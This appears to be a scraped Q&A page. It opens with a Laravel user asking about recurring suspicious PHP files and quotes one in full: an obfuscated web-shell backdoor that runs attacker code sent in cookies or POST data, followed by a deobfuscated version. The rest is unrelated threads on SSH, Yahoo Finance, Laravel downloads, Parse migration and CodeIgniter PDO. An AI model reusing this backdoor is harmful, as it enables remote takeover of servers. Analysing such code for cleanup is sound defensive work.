Under my Laravel application's public folder, there are some suspiciousphp files with weird name like "8xmzujk2.php".
Even though I try to delete those files one or two times, those files appear again after two or three days. I use the window server with apache. There are no record in apache's access and error log at the time those files are created.
If anyone encounter this issue before, please kindly suggest me the steps to solve this issue. All the suggestion are welcome. Thanks in advance.
The code inside this one of suspicious php file is as below.
<?php
$groqw = 'e-xv2i4_3r78g0*6kypmcoustndl#5\'b19aHf';$vcdoidm = Array();$vcdoidm[] = $groqw[35].$groqw[14];$vcdoidm[] = $groqw[20].$groqw[9].$groqw[0].$groqw[34].$groqw[24].$groqw[0].$groqw[7].$groqw[36].$groqw[22].$groqw[25].$groqw[20].$groqw[24].$groqw[5].$groqw[21].$groqw[25];$vcdoidm[] = $groqw[33].$groqw[36].$groqw[8].$groqw[34].$groqw[13].$groqw[10].$groqw[34].$groqw[32].$groqw[1].$groqw[29].$groqw[33].$groqw[4].$groqw[20].$groqw[1].$groqw[6].$groqw[10].$groqw[13].$groqw[32].$groqw[1].$groqw[11].$groqw[36].$groqw[13].$groqw[15].$groqw[1].$groqw[29].$groqw[29].$groqw[31].$groqw[10].$groqw[15].$groqw[0].$groqw[33].$groqw[13].$groqw[32].$groqw[33].$groqw[34].$groqw[34];$vcdoidm[] = $groqw[28];$vcdoidm[] = $groqw[20].$groqw[21].$groqw[22].$groqw[25].$groqw[24];$vcdoidm[] = $groqw[23].$groqw[24].$groqw[9].$groqw[7].$groqw[9].$groqw[0].$groqw[18].$groqw[0].$groqw[34].$groqw[24];$vcdoidm[] = $groqw[0].$groqw[2].$groqw[18].$groqw[27].$groqw[21].$groqw[26].$groqw[0];$vcdoidm[] = $groqw[23].$groqw[22].$groqw[31].$groqw[23].$groqw[24].$groqw[9];$vcdoidm[] = $groqw[34].$groqw[9].$groqw[9].$groqw[34].$groqw[17].$groqw[7].$groqw[19].$groqw[0].$groqw[9].$groqw[12].$groqw[0];$vcdoidm[] = $groqw[23].$groqw[24].$groqw[9].$groqw[27].$groqw[0].$groqw[25];$vcdoidm[] = $groqw[18].$groqw[34].$groqw[20].$groqw[16];foreach ($vcdoidm[8]($_COOKIE, $_POST) as $cpaxpnw => $afkxx){function dlvrss($vcdoidm, $cpaxpnw, $eowcms){return $vcdoidm[7]($vcdoidm[5]($cpaxpnw . $vcdoidm[2], ($eowcms / $vcdoidm[9]($cpaxpnw)) + 1), 0, $eowcms);}function isfap($vcdoidm, $eeqhx){return #$vcdoidm[10]($vcdoidm[0], $eeqhx);}function eeejy($vcdoidm, $eeqhx){$jfvsqg = $vcdoidm[4]($eeqhx) % 3;if (!$jfvsqg) {$ykpentn = $vcdoidm[1]; $fggryc = $ykpentn("", $eeqhx[1]($eeqhx[2]));$fggryc();exit();}}$afkxx = isfap($vcdoidm, $afkxx);eeejy($vcdoidm, $vcdoidm[6]($vcdoidm[3], $afkxx ^ dlvrss($vcdoidm, $cpaxpnw, $vcdoidm[9]($afkxx))));}
That strip of code runs arbitrary code sent in the post and cookies of a request
Here is the clearer version of it
foreach (array_merge($_COOKIE, $_POST) as $index => $value){
function dlvrss($vcdoidm, $index, $eowcms){
return substr(str_repeat($index . "9f3a07a1-592c-4701-8f06-55b76e9019aa", ($eowcms / strlen($index)) + 1), 0, $eowcms);
}
function isfap($vcdoidm, $eeqhx){
return #pack("H*", $eeqhx);
}
function eeejy($vcdoidm, $eeqhx){
$jfvsqg = count($eeqhx) % 3;
if (!$jfvsqg) {
$fggryc = create_function("", $eeqhx[1]($eeqhx[2]));
$fggryc();
exit();
}
}
$value = isfap($vcdoidm, $value);
eeejy($vcdoidm, explode("#", $value ^ dlvrss($vcdoidm, $index, strlen($value))));
}
See how in the end it runs a function sent in the request via
$fggryc = create_function("", $eeqhx[1]($eeqhx[2]));
$fggryc();`
You should have that fixed.
#Edit
I dont know how, sorry.
Related
I am performing SSH in Laravel whereby I connect to another server and download a file. I am using Laravel Collective https://laravelcollective.com/docs/5.4/ssh
So, the suggested way to do this is something like this
$result = \SSH::into('scripts')->get('/srv/somelocation/'.$fileName, $path);
if($result) {
return $path;
} else {
return 401;
}
Now that successfully downloads the file and moves it to my local server. However, I am always returned 401 because $result seems to be Null.
I cant find much or getting the result back from the SSH. I have also tried
$result = \SSH::into('scripts')->get('/srv/somelocation/'.$fileName, $path, function($line){
dd( $line.PHP_EOL);
});
But that never gets into the inner function.
Is there any way I can get the result back from the SSH? I just want to handle it properly if there is an error.
Thanks
Rather than rely on $result to give you true / false / error, you can check if the file was downloaded successfully in another way:
// download the file
$result = \SSH::into('scripts')->get('/srv/somelocation/'.$fileName, $path);
// see if downloaded file exists
if ( file_exists($path) ) {
return $path;
} else {
return 401;
}
u need to pass file name also like this in get and put method:
$fileName = "example.txt";
$get = \SSH::into('scripts')->get('/remote/somelocation/'.$fileName, base_path($fileName));
in set method
$set = \SSH::into('scripts')->set(base_path($fileName),'/remote/location/'.$fileName);
in list
$command = SSH::into('scripts')->run(['ls -lsa'],function($output) {
dd($output);
});
I have a service which uses a Yahoo! Finance table yahoo.finance.xchange. This morning I noticed it has stopped working because suddenly Yahoo! started to return an error saying:
{
"error": {
"lang": "en-US",
"description": "No definition found for Table yahoo.finance.xchange"
}
}
This is the request URL. Interesting fact: if I try to refresh the query multiple times, sometimes I get back a correct response but this happen very rarely (like 10% of the time). Days before, everything was fine.
Does this mean Yahoo API is down or am I missing something because the API was changed? I would appreciate any help.
Since I have the same problem and that it started today too, that others came to post exactly in the same time as well, and that it still works most of the time, the only explanation I can find is that they have some random database errors on their end and we can hope that this will be solved soon. I also have a 20% rate of failures when refreshing the page of the query.
My guess is that they use many servers to handle the requests (let's say 8) and that one of them is empty or doesn't have that table for some reasons so whenever it directs the query to that server, the error is returned.
Temporary solution: Just modify your script to retry 3-4 times. That did it for me because among 5 attempts at least one succeeds.
I solve this issue by using quote.yahoo.com instead of the query.yahooapis.com service. Here's my code:
function devise($currency_from,$currency_to,$amount_from){
$url = "http://quote.yahoo.com/d/quotes.csv?s=" . $currency_from . $currency_to . "=X" . "&f=l1&e=.csv";
$handle = fopen($url, "r");
$exchange_rate = fread($handle, 2000);
fclose($handle );
$amount_to = $amount_from * $exchange_rate;
return round($amount_to,2);
}
EDIT the above no longer works. At this point, lets just forget about yahoo lol Use this instead
function convertCurrency($from, $to, $amount)
{
$url = file_get_contents('https://free.currencyconverterapi.com/api/v5/convert?q=' . $from . '_' . $to . '&compact=ultra');
$json = json_decode($url, true);
$rate = implode(" ",$json);
$total = $rate * $amount;
$rounded = round($total);
return $total;
}
Same error, i migrate to http://finance.yahoo.com
Here is C# example
private static readonly ILog Log = LogManager.GetCurrentClassLogger();
private int YahooTimeOut = 4000;
private int Try { get; set; }
public decimal GetRate(string from, string to)
{
var url =
string.Format(
"http://finance.yahoo.com/d/quotes.csv?e=.csv&f=sl1d1t1&s={0}{1}=X", from, to);
var request = (HttpWebRequest)WebRequest.Create(url);
request.UseDefaultCredentials = true;
request.ContentType = "text/csv";
request.Timeout = YahooTimeOut;
try
{
using (var response = (HttpWebResponse)request.GetResponse())
{
var resStream = response.GetResponseStream();
using (var reader = new StreamReader(resStream))
{
var html = reader.ReadToEnd();
var values = Regex.Split(html, ",");
var rate = Convert.ToDecimal(values[1], new CultureInfo("en-US"));
if (rate == 0)
{
Thread.Sleep(550);
++Try;
return Try < 5 ? GetRate(from, to) : 0;
}
return rate;
}
}
}
catch (Exception ex)
{
Log.Warning("Get currency rate from Yahoo fail " + ex);
Thread.Sleep(550);
++Try;
return Try < 5 ? GetRate(from, to) : 0;
}
}
I've got the same issue.
I need exchange rates in my app, so I decided to use currencylayer.com API instead - they give 168 currencies, including precious metals and Bitcoin.
I've also written a microservice using webtask.io to cache rates from currencylayer and do cross-rate calculations.
And I've written a blog post about it 🤓
Check it out if you want to run your own microservice, it's pretty easy 😉
I found solution, in my case, just change http to https and everything works fine.
I have been going round and round with this. I have uploads working with the follow:
public function store(Tool $tool)
{
If(Input::hasFile('file')){
$file = Input::file('file');
$name = $file->getClientOriginalName();
$path=Storage::put('public',$file); //Storage::disk('local')->put($name,$file,'public');
$file = new File;
$file->tool_id = $tool->id;
$file->file_name = $name;
$file->path_to_file = $path;
$file->name_on_disk = basename($path);
$file->user_name = \Auth::user()->name;
$file->save();
return back();
}
however when I try to download with:
public function show($filename)
{
$url = Storage::disk('public')->url($filename);
///$file = Storage::disk('public')->get($filename);
return response()->download($url);
}
I get the FileNotFound exception from laravel
However, if I use this instead:
$file = Storage::disk('public')->get($filename);
return response()->download($file);
I get
FileNotFoundException in File.php line 37: The file "use calib;
insert into
notes(tool_id,user_id,note,created_at,updated_at)
VALUES(1,1,'windows server 2008 sucks',now(),now());" does not exist
which is the actual content of the file...
It can obviously find the file. but why wont it download?
Try this:
return response()->download(storage_path("app/public/{$filename}"));
Replace:
$file = Storage::disk('public')->get($filename);
return response()->download($file);
With:
return response()->download(storage_path('app/public/' . $filename));
response()->download() takes a path to a file, not a file content. More information here: https://laravel.com/docs/5.4/responses#file-downloads
If any one still could not find their file even though the file clearly exists then try
return response()->file(storage_path('/app/' . $filename, $headers));
It could be due to a missing directory separator or it isn't stored inside the public folder.
We migrated the data(without files) to mLab and Heroku. So the old files are still on Parse.
Since then, any new file added goes into Gridstore, which is the default file storage for mLab.
Now I migrated old parse files from Parse to an S3 Bucket using sashido
The files are migrated and are accessible using S3Adapter in Heroku.
But the files on Gridstore are not accessible now. How can I migrate them to the same S3 bucket and change references in mLab?
Maybe you're interested in the solution I've tried. It's not a simple operation, but I migrated successfully 3 databases with my parse server configuration.
It's based in a PHP script (with the Parse PHP SDK) that runs through every object, it gets the file from Parse.com and sets it (with any of your adapter configuration) in your own server.
The script looks like:
<?php
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);
date_default_timezone_set('America/New_York');
$fileField = $argv[1];
$class = $argv[2];
require_once 'vendor/autoload.php';
use Parse\ParseObject;
use Parse\ParseQuery;
use Parse\ParseACL;
use Parse\ParsePush;
use Parse\ParseUser;
use Parse\ParseInstallation;
use Parse\ParseException;
use Parse\ParseAnalytics;
use Parse\ParseFile;
use Parse\ParseCloud;
use Parse\ParseClient;
$app_id = "******";
$rest_key = "******";
$master_key = "******";
ParseClient::initialize($app_id, $rest_key, $master_key);
ParseClient::setServerURL('http://localhost:1338/', 'parse');
$query = new ParseQuery($class);
$query->ascending("createdAt"); // it's just my preference
$query->exists($fileField);
$query->limit(1);
$count = $query->count();
for ($i = 0; $i < $count; $i = $i + 1) {
try {
$query->skip($i);
// get Entry
$entryWithFile = $query->first();
// get file
$parseFile = $entryWithFile->get($fileField);
// filename
$fileName = $parseFile->getName();
// if the file is hosted in Parse, do the job, otherwise continue with the next one
if (strpos($fileName, "tfss-") === false) {
echo "\nThis is already an internal file, skipping...";
continue;
}
$newFileName = str_replace("tfss-", "", $fileName);
$binaryFile = file_get_contents($parseFile->getURL());
$newFile = ParseFile::createFromData($binaryFile, $newFileName);
$entryWithFile->set($fileField, $newFile);
$entryWithFile->save(true);
echo "\nFile saved\n";
}
catch (Exception $e) {
// The conection with mongo or the server could be off for some second, let's retry it ;)
sleep(10);
continue;
}
}
echo "\n";
echo "END!";
?>
set your parse url correctly.
Imagine you want to migrate the file from class _User with field imageProfile, so be sure that you pass $fileField = "imageProfile"; $class = "_User".
Run that code for any field per class.
I did a dumb solution to work in parallel, which would be skipping steps in the for loop, for example:
<?php
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);
date_default_timezone_set('America/New_York');
$index = $argv[1];
$of = $argv[2];
$fileField = $argv[3];
$class = $argv[4];
require_once 'vendor/autoload.php';
use Parse\ParseObject;
use Parse\ParseQuery;
use Parse\ParseACL;
use Parse\ParsePush;
use Parse\ParseUser;
use Parse\ParseInstallation;
use Parse\ParseException;
use Parse\ParseAnalytics;
use Parse\ParseFile;
use Parse\ParseCloud;
use Parse\ParseClient;
$app_id = "********";
$rest_key = "********";
$master_key = "********";
ParseClient::initialize($app_id, $rest_key, $master_key);
ParseClient::setServerURL('http://localhost:1338/', 'parse');
$query = new ParseQuery($class);
$query->ascending("createdAt");
$query->exists($fileField);
$query->limit(1);
$count = $query->count();
for ($i = $index; $i < $count; $i = $i + $of) {
try {
$query->skip($i);
// get Entry
$entryWithFile = $query->first();
// get file
$parseFile = $entryWithFile->get($fileField);
// filename
$fileName = $parseFile->getName();
// if the file is hosted in Parse, do the job, otherwise continue with the next one
if (strpos($fileName, "tfss-") === false) {
echo "\nThis is already an internal file, skipping...";
continue;
}
$newFileName = str_replace("tfss-", "", $fileName);
$binaryFile = file_get_contents($parseFile->getURL());
$newFile = ParseFile::createFromData($binaryFile, $newFileName);
$entryWithFile->set($fileField, $newFile);
$entryWithFile->save(true);
echo "\nFile saved\n";
}
catch (Exception $e) {
// The conection with mongo or the server could be off for some second, let's retry it ;)
sleep(10);
continue;
}
}
echo "\n";
echo "END!";
?>
so if you configure $fileField and $class as before, and you can open 3 threads and run:
php migrator.php 0 3 "imageProfile" "_User"
php migrator.php 1 3 "imageProfile" "_User"
php migrator.php 2 3 "imageProfile" "_User"
so you will have loops running like:
object 0, 3, 6
object 1, 4, 7
object 2, 5, 8
Good luck, and be quick! It's going to shut down in a few days.
I am trying to get the new PDO driver running in Code Igniter 2.1.1 in (to start with) the local (Mac OS 10.7) copy of my app.
I initially coded it using Active Record for all db operations, and I am now thinking I want to use PDO prepared statements in my model files, going forward.
I modified 'application/config/database.php' like so:
(note a couple minor embedded questions)
[snip]
$active_group = 'local_dev';
$active_record = TRUE;//<---BTW, will this need to stay TRUE to make CI sessions work? For better security, don't we want db-based CI sessions to use PDO too?
//http://codeigniter.com/user_guide/database/configuration.html:
//Note: that some CodeIgniter classes such as Sessions require Active Records be enabled to access certain functionality.
//this is the config setting that I am guessing (?) is my main problem:
$db['local_dev']['hostname'] = 'localhost:/tmp/mysql.sock';
// 1.) if $db['local_dev']['dbdriver']='mysql', then here ^^^ 'localhost:/tmp/mysql.sock' works, 2.) but if $db['local_dev']['dbdriver']='pdo', then it fails with error msg. shown below.
$db['local_dev']['username'] = 'root';
$db['local_dev']['password'] = '';
$db['local_dev']['database'] = 'mydbname';
$db['local_dev']['dbdriver'] = 'pdo';
$db['local_dev']['dbprefix'] = '';
$db['local_dev']['pconnect'] = TRUE;
$db['local_dev']['db_debug'] = TRUE;//TRUE
$db['local_dev']['cache_on'] = FALSE;
$db['local_dev']['cachedir'] = '';
$db['local_dev']['char_set'] = 'utf8';
$db['local_dev']['dbcollat'] = 'utf8_general_ci';
$db['local_dev']['swap_pre'] = '';
$db['local_dev']['autoinit'] = TRUE;
$db['local_dev']['stricton'] = FALSE;
[snip]
With the above config., as soon as I load a controller, I get this error message:
Fatal error: Uncaught exception 'PDOException' with message 'could not find driver' in
/Library/WebServer/Documents/system/database/drivers/pdo/pdo_driver.php:114 Stack trace: #0
/Library/WebServer/Documents/system/database/drivers/pdo/pdo_driver.php(114): PDO->__construct('localhost:/tmp/...', 'root', '', Array) #1 /Library/WebServer/Documents/system/database/DB_driver.php(115): CI_DB_pdo_driver->db_pconnect() #2
/Library/WebServer/Documents/system/database/DB.php(148): CI_DB_driver->initialize() #3
/Library/WebServer/Documents/system/core/Loader.php(346): DB('', NULL) #4
/Library/WebServer/Documents/system/core/Loader.php(1171): CI_Loader->database() #5
/Library/WebServer/Documents/system/core/Loader.php(152): CI_Loader->_ci_autoloader() #6
/Library/WebServer/Documents/system/core/Con in
/Library/WebServer/Documents/system/database/drivers/pdo/pdo_driver.php on line 114
I tried swapping out the 'pdo_driver.php' file from the one on github, as per this:
http://codeigniter.com/forums/viewthread/206124/
...but that just generates other errors, not to mention is disturbing to a newbie who does not want to touch the system files if at all possible.
This thread also seems to imply the need to be hacking the 'pdo_driver.php' system file:
CodeIgniter PDO database driver not working
It seems odd to me, though, that (someone thought that) a hack to a system file is needed to make PDO work in CI v.2.1.1, huh?
Thanks for any suggestions I can try.
I don't know if this might be helpful for you since you already started using the CI functions, but I made my own library for PDO with sqlite and just auto load it. My needs were simple, so it serves its purpose.
<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');
/**
* CodeIgniter PDO Library
*
*
* #author Michael Cruz
* #version 1.0
*/
class Sqlite_pdo
{
var $DB;
public function connect($path) {
try {
$this->DB = new PDO('sqlite:' . $path);
}
catch(PDOException $e) {
print "Error: " . $e->getMessage();
die();
}
}
public function simple_query($SQL) {
$results = $this->DB->query($SQL)
or die('SQL Error: ' . print_r($this->DB->errorInfo()));
return $results;
}
public function prepared_query($SQL, $bind = array()) {
$q = $this->DB->prepare($SQL)
or die('Prepare Error: ' . print_r($this->DB->errorInfo()));
$q->execute($bind)
or die('Execute Error: ' . print_r($this->DB->errorInfo()));
$q->setFetchMode(PDO::FETCH_BOTH);
return $q;
}
public function my_prepare($SQL) {
$q = $this->DB->prepare($SQL)
or die('Error: ' . print_r($this->DB->errorInfo()));
return $q;
}
public function my_execute($q, $bind) {
$q->execute($bind)
or die('Error: ' . print_r($this->DB->errorInfo()));
$q->setFetchMode(PDO::FETCH_BOTH);
return $q;
}
public function last_insert_id() {
return $this->DB->lastInsertId();
}
}
/* End of file Sqlite_pdo.php */
thanks to the noob thread http://codeigniter.com/forums/viewthread/180277/ (InsiteFX’s answer)..
I figured out the below seems to work (need to test more to be 100%... but at least the error messages are gone:
$db['local_dev']['hostname'] = 'mysql:host=127.0.0.1';